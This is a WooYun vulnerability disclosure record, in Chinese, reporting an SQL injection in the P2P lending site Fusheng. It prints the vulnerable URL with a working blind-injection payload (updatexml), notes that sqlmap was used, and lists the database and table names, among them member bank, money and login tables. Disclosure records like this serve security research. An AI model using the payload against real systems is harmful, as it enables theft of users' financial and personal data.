当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0164939

漏洞标题:p2p金融安全之富生富sql注入漏洞

相关厂商:富生富

漏洞作者: yibeizifd

提交时间:2015-12-29 09:06

修复时间:2016-02-09 23:29

公开时间:2016-02-09 23:29

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-02-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

富生富是上海生富金融信息服务有限公司于2014年5月新推出的提供高安全性融贷服务的P2P平台,8月25日2.0版本全新上线。引入供应链金融,平台发布由核心企业推荐的中小企业融资项目标, 投资人可以根据借款期限和年化利率等选择合适的项目进行投资,获取一定的收益。

详细说明:

http://www.fusheng100.com/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)
存在mysql盲注,1=1 返回 "\u5220\u9664\u6210\u529f" "删除成功". 1=2 返回 删除失败

1.png

2.png


sqlmap进行注入发现大量的数据

3.png

4.png


漏洞证明:

2.png


3.png

4.png


5.png


数据库databases
[*] fushengfu
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
tables
lzh_acl |
| lzh_ad |
| lzh_area |
| lzh_article |
| lzh_article_area |
| lzh_article_category |
| lzh_article_category_area |
| lzh_auser_dologs |
| lzh_ausers |
| lzh_auto_borrow |
| lzh_borrow_fsf |
| lzh_borrow_info |
| lzh_borrow_info_lock |
| lzh_borrow_investor |
| lzh_borrow_tip |
| lzh_borrow_verify |
| lzh_borrow_vouch |
| lzh_comment |
| lzh_department |
| lzh_donate |
| lzh_face_apply |
| lzh_feedback |
| lzh_friend |
| lzh_global |
| lzh_hetong |
| lzh_inner_msg |
| lzh_invest_credit |
| lzh_invest_detb |
| lzh_investor_detail |
| lzh_jifen_choujiang |
| lzh_jubao |
| lzh_kvtable |
| lzh_market_address |
| lzh_market_goods |
| lzh_market_jifenlist |
| lzh_market_log |
| lzh_member_address |
| lzh_member_apply |
| lzh_member_banks |
| lzh_member_borrow_show |
| lzh_member_contact_info |
| lzh_member_creditslog |
| lzh_member_data_info |
| lzh_member_department_info |
| lzh_member_ensure_info |
| lzh_member_financial_info |
| lzh_member_friend |
| lzh_member_house_info |
| lzh_member_info |
| lzh_member_integrallog |
| lzh_member_limitlog |
| lzh_member_login |
| lzh_member_money |
| lzh_member_moneylog |
| lzh_member_msg |
| lzh_member_payonline |
| lzh_member_phonelog |
| lzh_member_remark |
| lzh_member_safequestion |
| lzh_member_withdraw |
| lzh_members |
| lzh_members_status |
| lzh_name_apply |
| lzh_navigation |
| lzh_oauth |
| lzh_qq |
| lzh_recommend_log |
| lzh_smslog |
| lzh_sys_tip |
| lzh_today_reward |
| lzh_transfer_borrow_info |
| lzh_transfer_borrow_info_lock |
| lzh_transfer_borrow_investor |
| lzh_transfer_detail |
| lzh_transfer_investor_detail |
| lzh_verify |
| lzh_video_apply |
| lzh_vip_apply

修复方案:

过滤,升级

版权声明:转载请注明来源 yibeizifd@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝